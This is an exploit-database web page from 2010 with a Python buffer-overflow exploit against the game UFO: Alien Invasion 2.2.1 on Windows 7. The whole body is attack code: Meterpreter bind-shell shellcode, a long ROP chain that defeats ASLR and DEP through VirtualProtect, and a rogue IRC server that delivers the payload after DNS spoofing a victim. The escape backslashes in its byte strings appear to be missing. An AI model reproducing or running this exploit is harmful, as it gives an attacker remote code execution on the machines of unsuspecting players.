UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP By
Posted on 05 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================= UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass) ================================================================= #!/usr/bin/python # # Exploit Title: UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass) # Date: July 5, 2010 # Author: Node # Software Link: http://sourceforge.net/projects/ufoai/files/UFO_AI%202.x/2.2.1/ufoai-2.2.1-win32.exe/download # Version: "UFO: Alien Invasion 2.2.1 x86 Apr 28 2008 Win32 RELEASE" # Tested on: Windows 7 Ultimate x64 ENG # CVE : # Max shellcode size: 328 bytes # Badchars: 'x00x0ax0d' # Instructions: 1. DNS spoof/redirect "irc.freenode.org" to your ip # 2- Have your victim click "Multiplayer" and then "Lobby" # # Notes: There is a possibility that this exploit can work on a different # windows version, by just changing the last bytes of 0xffff34ec # to wherever VirtualProtect() resides in that version of kernel32.dll. import sys, socket #msfpayload windows/meterpreter/bind_tcp LPORT=4444 R | msfencode -b 'x00x0ax0d' -t c #[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1) shellcode = ("xbfxb7x89xfex0exdaxd3xd9x74x24xf4x2bxc9xb1x4b" + "x5ex83xc6x04x31x7ex11x03x7ex11xe2x42x75x16x87" + "xacx86xe7xf8x25x63xd6x2ax51xe7x4bxfbx12xa5x67" + "x70x76x5exf3xf4x5ex51xb4xb3xb8x5cx45x72x04x32" + "x85x14xf8x49xdaxf6xc1x81x2fxf6x06xffxc0xaaxdf" + "x8bx73x5bx54xc9x4fx5axbax45xefx24xbfx9ax84x9e" + "xbexcax35x94x88xf2x3exf2x28x02x92xe0x14x4dx9f" + "xd3xefx4cx49x2ax10x7fxb5xe1x2fx4fx38xfbx68x68" + "xa3x8ex82x8ax5ex89x51xf0x84x1cx47x52x4ex86xa3" + "x62x83x51x20x68x68x15x6ex6dx6fxfax05x89xe4xfd" + "xc9x1bxbexd9xcdx40x64x43x54x2dxcbx7cx86x89xb4" + "xd8xcdx38xa0x5bx8cx54x05x56x2exa5x01xe1x5dx97" + "x8ex59xc9x9bx47x44x0exdbx7dx30x80x22x7ex41x89" + "xe0x2ax11xa1xc1x52xfax31xedx86xadx61x41x79x0e" + "xd1x21x29xe6x3bxaex16x16x44x64x3fxe6x61xd4x28" + "x0bx95xcaxf4x82x73x86x14xc3x2cx3fxd7x30xe5xd8" + "x28x13x5ax70xbfx2bxb5x46xc0xabx90xe4x6dx03x72" + "x7fx7ex90x63x80xabxb0xf4x17x21x51xb7x86x36x78" + "x2dx49xa3x87xe7x1ex5bx8axdex69xc4x75x35xe2xcd" + "xe3xf5x9dx31xe4xf5x5dx64x6exf5x35xd0xcaxa6x20" + "x1fxc7xdbxf8x8axe8x8dxadx1dx81x33x8bx6ax0excc" + "xfex6ax72x1bxc7xe8x82x2ex2bx31x60") #start rop = "x5axc9x70x61" #0x6170C95A : PUSH ESP # POP EBX # POP EBP rop += "A"*4 rop += "xd6x14x6cx68" #0x686C14D6 : ADD ESP,1C rop += "1111" #VirtualProtect placeholder rop += "2222" #return address placeholder rop += "3333" #lpAddress placeholder rop += "4444" #dwsize placeholder rop += "5555" #flNewProtect placeholder rop += "x05xe0x76x61" #0x6176e005 lpflOldProtect writable in SDL_mixer.dll rop += "A"*4 rop += "x45x57x10x68" #0x68105745 : MOV EAX,EBX # POP EBX # POP EBP rop += "A"*8 rop += "xddx5bx10x68" #0x68105BDD : MOV EDX,EAX # MOV EAX,EDX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX #grabbing kernel32 rop += "xb8x51x58x67" #0x675851B8 : MOV EAX,200 rop += "x71x33x6cx68" #0x686C3371 : MOV ECX,EAX # MOV EAX,ECX rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX rop += "x53x23x10x68" #0x68102353 : XOR EAX,EAX rop += "x50x49x58x67" #0x67584950 : ADD EAX,20 rop += "x50x49x58x67" #0x67584950 : ADD EAX,20 rop += "x50x49x58x67" #0x67584950 : ADD EAX,20 rop += "x50x49x58x67" #0x67584950 : ADD EAX,20 rop += "x50x49x58x67" #0x67584950 : ADD EAX,20 A0 rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP rop += "x25x54x72x61" #0x61725425 : ADD ECX,EBP rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP rop += "x50x49x58x67" #0x67584950 : ADD EAX,20 rop += "x50x49x58x67" #0x67584950 : ADD EAX,20 rop += "x50x49x58x67" #0x67584950 : ADD EAX,20 rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP rop += "x25x54x72x61" #0x61725425 : ADD ECX,EBP 9a0 rop += "x73x33x6cx68" #0x686C3373 : MOV EAX,ECX rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP rop += "x28x51x58x67" #0x67585128 : MOV EAX,2 rop += "x71x33x6cx68" #0x686C3371 : MOV ECX,EAX # MOV EAX,ECX rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP rop += "x6fx9fx58x67" #0x67589F6F : ADD ECX,EAX # MOVZX EAX,CX rop += "x9cx8dx59x67" #0x67598D9C : POP ECX rop += "x05xe0x76x61" #0x6176e005 : writable rop += "xeex9bx71x61" #0x61719BEE : MOV EBX,EDX # SUB EBX,EAX # MOV EAX,EBX # MOV WORD PTR DS:[ECX+44],AX # ADD ESP,4 # POP EBX # POP EBP rop += "A"*4 rop += "A"*4 rop += "A"*4 rop += "x67x01x11x68" #0x68110167 : MOV EAX,DWORD PTR DS:[EAX] #VirtualProtect() rop += "x71x33x6cx68" #0x686C3371 : # MOV ECX,EAX # MOV EAX,ECX rop += "x5axc9x70x61" #0x6170C95A : {POP} # PUSH ESP # POP EBX # POP EBP rop += "A"*4 rop += "x53x23x10x68" #0x68102353 : # XOR EAX,EAX rop += "x50x49x58x67" #0x67584950 : # ADD EAX,20 rop += "x50x49x58x67" #0x67584950 : # ADD EAX,20 rop += "x50x49x58x67" #0x67584950 : # ADD EAX,20 rop += "x6bx8cx13x68" #0x68138C6B : # XCHG EAX,EBP rop += "x6ax1fx13x68" #0x68131F6A : # ADD EBP,EBX rop += "x73x33x6cx68" #0x686C3373 : # MOV EAX,ECX rop += "x6bx8cx13x68" #0x68138C6B : # XCHG EAX,EBP rop += "x71x33x6cx68" #0x686C3371 : # MOV ECX,EAX # MOV EAX,ECX rop += "x6bx8cx13x68" #0x68138C6B : # XCHG EAX,EBP rop += "xe2x13x6cx68" #0x686C13E2 : # POP EBX rop += "xecx34xffxff" #VirtualProtect() is found at 0x????34ec, if not, change this to match your windows version rop += "x42x35x80x70" #0x70803542 : # XOR AL,AL # POP EBP rop += "A"*4 rop += "x02x4dx6dx68" #0x686D4D02 : # ADD AL,BL rop += "x6bx8cx13x68" #0x68138C6B : # XCHG EAX,EBP rop += "x73x33x6cx68" #0x686C3373 : # MOV EAX,ECX rop += "x6bx8cx13x68" #0x68138C6B : # XCHG EAX,EBP rop += "x71x33x6cx68" #0x686C3371 : # MOV ECX,EAX # MOV EAX,ECX rop += "x34xa5x70x61" #0x6170A534 : # MOV CH,BH # ADD AL,BYTE PTR DS:[EAX] # MOV ESP,EBP # POP EBP rop += "A"*4 rop += "A"*4 rop += "A"*4 rop += "A"*4 rop += "xb9x4bx58x67" #0x67584BB9 : MOV DWORD PTR DS:[EDX],ECX #fetch shellcode rop += "x5axc9x70x61" #0x6170C95A : {POP} # PUSH ESP # POP EBX # POP EBP rop += "A"*4 rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x45x57x10x68" #0x68105745 : {POP} # MOV EAX,EBX # POP EBX # POP EBP rop += "A"*4 rop += "A"*4 rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP rop += "x53x23x10x68" #0x68102353 : XOR EAX,EAX rop += "xe2x13x6cx68" #0x686C13E2 : # POP EBX rop += "xacxffxffxff" #0xac * 2 = 0x158 rop += "x02x4dx6dx68" #0x686D4D02 : # ADD AL,BL rop += "x71x33x6cx68" #0x686C3371 : MOV ECX,EAX # MOV EAX,ECX rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX rop += "x73x33x6cx68" #0x686C3373 : MOV EAX,ECX rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP rop += "x6fx9fx58x67" #0x67589F6F : ADD ECX,EAX # MOVZX EAX,CX shellcode rop += "xb9x4bx58x67" #0x67584BB9 : # MOV DWORD PTR DS:[EDX],ECX #again rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x73x33x6cx68" #0x686C3373 : MOV EAX,ECX rop += "x26x51x58x67" #0x67585126 : MOV DWORD PTR DS:[EDX],EAX # MOV EAX,2 #set dwsize 0x148 (328) rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop += "x53x23x10x68" #0x68102353 : XOR EAX,EAX rop += "xe2x13x6cx68" #0x686C13E2 : # POP EBX rop += "xa4xffxffxff" #0xa4 * 2 = 0x148 (328) rop += "x02x4dx6dx68" #0x686D4D02 : # ADD AL,BL rop += "x71x33x6cx68" #0x686C3371 : MOV ECX,EAX # MOV EAX,ECX rop += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX rop += "x73x33x6cx68" #0x686C3373 : MOV EAX,ECX rop += "x26x51x58x67" #0x67585126 : MOV DWORD PTR DS:[EDX],EAX # MOV EAX,2 #forwardjump rop += "x53x23x10x68" #0x68102353 : XOR EAX,EAX rop += "xe2x13x6cx68" #0x686C13E2 : # POP EBX rop += "x70xffxffxff" # 0x70 rop += "x02x4dx6dx68" #0x686D4D02 : # ADD AL,BL rop += "x5axc9x70x61" #0x6170C95A : {POP} # PUSH ESP # POP EBX # POP EBP rop += "A"*4 rop += "x6bx8cx13x68" #0x68138C6B : XCHG EAX,EBP rop += "x6ax1fx13x68" #0x68131F6A : # ADD EBP,EBX rop += "xc6xcdx6dx68" #0x686DCDC6 : # LEAVE rop += "A"*4 #backjump rop2 = "x5axc9x70x61" #0x6170C95A : {POP} # PUSH ESP # POP EBX # POP EBP rop2 += "A"*4 rop2 += "x45x57x10x68" #0x68105745 : {POP} # MOV EAX,EBX # POP EBX # POP EBP rop2 += "A"*4 rop2 += "A"*4 rop2 += "xddx5bx10x68" #0x68105BDD : MOV EDX,EAX # MOV EAX,EDX rop2 += "xb8x51x58x67" #0x675851B8 : MOV EAX,200 rop2 += "x50x49x58x67" #0x67584950 : ADD EAX,20 rop2 += "xe2x13x6cx68" #0x686C13E2 : # POP EBX rop2 += "x0cxffxffxff" # 12 rop2 += "x02x4dx6dx68" #0x686D4D02 : # ADD AL,BL rop2 += "x9cx8dx59x67" #0x67598D9C : POP ECX rop2 += "x05xe0x76x61" #0x6176e005 : writable rop2 += "xeex9bx71x61" #0x61719BEE : MOV EBX,EDX # SUB EBX,EAX # MOV EAX,EBX # MOV WORD PTR DS:[ECX+44],AX # ADD ESP,4 # POP EBX # POP EBP rop2 += "A"*4 rop2 += "A"*4 rop2 += "A"*4 rop2 += "x7ax36x13x68" #0x6813367A : XCHG EAX,ESP #set flNewProtect 0x40 (land here) rop2 += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop2 += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop2 += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop2 += "x72x34x58x67" #0x67583472 : INC EDX # DEC EAX rop2 += "x53x23x10x68" #0x68102353 : XOR EAX,EAX rop2 += "x50x49x58x67" #0x67584950 : ADD EAX,20 rop2 += "x50x49x58x67" #0x67584950 : ADD EAX,20 rop2 += "x26x51x58x67" #0x67585126 : MOV DWORD PTR DS:[EDX],EAX # MOV EAX,2 #ending rop2 += "x71x33x6cx68" #0x686C3371 : MOV ECX,EAX # MOV EAX,ECX rop2 += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX rop2 += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX rop2 += "xe3xf9x71x61" #0x6171F9E3 : ADD ECX,ECX rop2 += "x73x33x6cx68" #0x686C3373 : MOV EAX,ECX rop2 += "x52x3dx13x68" #0x68133D52 : SUB EDX,EAX # MOV EAX,EDX rop2 += "x7ax36x13x68" #0x6813367A : XCHG EAX,ESP end = "x0dx0a" sploit = "001 :" sploit += rop sploit += "x90" * (552 - len(rop)) sploit += rop2 sploit += shellcode sploit += end s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', 6667)) s.listen(1) print ("[*] Listening on port 6667.") print ("[*] Have someone connect to you.") print ("[*] Type <control>-c to exit.") conn, addr = s.accept() print '[*] Received connection from: ', addr conn.send(sploit) conn.close # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-05]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
